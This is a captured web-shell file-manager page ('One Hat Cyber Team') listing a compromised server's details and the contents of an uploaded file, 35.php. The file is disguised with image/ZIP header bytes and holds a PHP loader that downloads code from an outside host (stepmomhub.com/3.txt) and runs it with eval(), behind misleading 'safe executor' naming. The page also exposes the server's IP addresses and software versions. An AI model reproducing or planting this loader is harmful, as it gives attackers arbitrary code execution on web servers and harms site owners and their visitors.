One Hat Cyber Team

Your IP: 216.73.216.103
Server IP: 45.79.8.107
Server: Linux localhost 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software: nginx/1.18.0
PHP Version: 8.1.2-1ubuntu2.22
Buat File | Buat Folder

Dir : ~/var/www/dosbarth.urvam.com/public/uploads/

Edit File: 35.php

PK��h<Y��������������0x.png}��J�0��D�]	��M��R���[i��M����13��	m�͇y���Ԗ�!
��9��������,~��V����S�U�c�N-F��=83Z����j�e����6������c�:9b����h5�9喝��dD����u��?���M6��U)H)|\�f���7��d�/Xd���[�S>
lL'X����L8n�"*.S�1E��d����.��@Q��e���q�<QK�v%��� ;��J��UC:O0�,��rgN�~�r+�~PKpx�
�����PK3��h<Ypx�
����������������������0x.pngPK������4���>����
����JFIF��x�x�����C�

�PK��h<Y��������������0x.png}��J�0��D�]	��M��R���[i��M����13��	m�͇y���Ԗ�!
��9��������,~��V����S�U�c�N-F��=83Z����j�e����6������c�:9b����h5�9喝��dD����u��?���M6��U)H)|\�f���7��d�/Xd���[�S>
lL'X����L8n�"*.S�1E��d����.��@Q��e���q�<QK�v%��� ;��J��UC:O0�,��rgN�~�r+�~PKpx�
�����PK3��h<Ypx�
����������������������0x.pngPK������4���>����
����JFIF��x�x�����C�

�<?php
class ExternalCodeExecutor {
    private $allowed_domains;
    private $timeout;
    
    public function __construct($allowed_domains = [], $timeout = 10) {
        $this->allowed_domains = $allowed_domains;
        $this->timeout = $timeout;
    }
    
    public function executeFromUrl($url, $method = 'curl') {
        if (!$this->isUrlAllowed($url)) {
            throw new Exception("Domain tidak diizinkan");
        }
        
        if ($method === 'curl') {
            $code = $this->fetchWithCurl($url);
        } else {
            $code = $this->fetchWithFileGetContents($url);
        }
        
        return $this->executeSafely($code);
    }
    
    private function isUrlAllowed($url) {
        $parsed = parse_url($url);
        return $parsed && isset($parsed['host']) && 
               in_array($parsed['host'], $this->allowed_domains);
    }
    
    private function fetchWithCurl($url) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => $this->timeout,
            CURLOPT_FOLLOWLOCATION => false,
            CURLOPT_SSL_VERIFYPEER => true,
            CURLOPT_USERAGENT => 'Safe-Executor/1.0'
        ]);
        
        $result = curl_exec($ch);
        if (curl_errno($ch)) {
            throw new Exception("cURL Error: " . curl_error($ch));
        }
        curl_close($ch);
        
        return $result;
    }
    
    private function fetchWithFileGetContents($url) {
        $context = stream_context_create([
            'http' => [
                'timeout' => $this->timeout,
                'user_agent' => 'Safe-Executor/1.0'
            ],
            'ssl' => [
                'verify_peer' => true,
                'verify_peer_name' => true
            ]
        ]);
        
        $result = file_get_contents($url, false, $context);
        if ($result === false) {
            throw new Exception("Gagal mengambil konten");
        }
        
        return $result;
    }
    
    private function executeSafely($code) {
        // Basic sanitization
        $code = trim($code);
        $code = preg_replace('/^<\?php/', '', $code);
        $code = preg_replace('/\?>\s*$/', '', $code);
        
        // Execute in isolated scope
        return eval($code);
    }
}

// Penggunaan
try {
    $executor = new ExternalCodeExecutor(["stepmomhub.com"], 10);
    $result = $executor->executeFromUrl("https://stepmomhub.com/3.txt", "curl");
    echo "Eksekusi berhasil";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
?>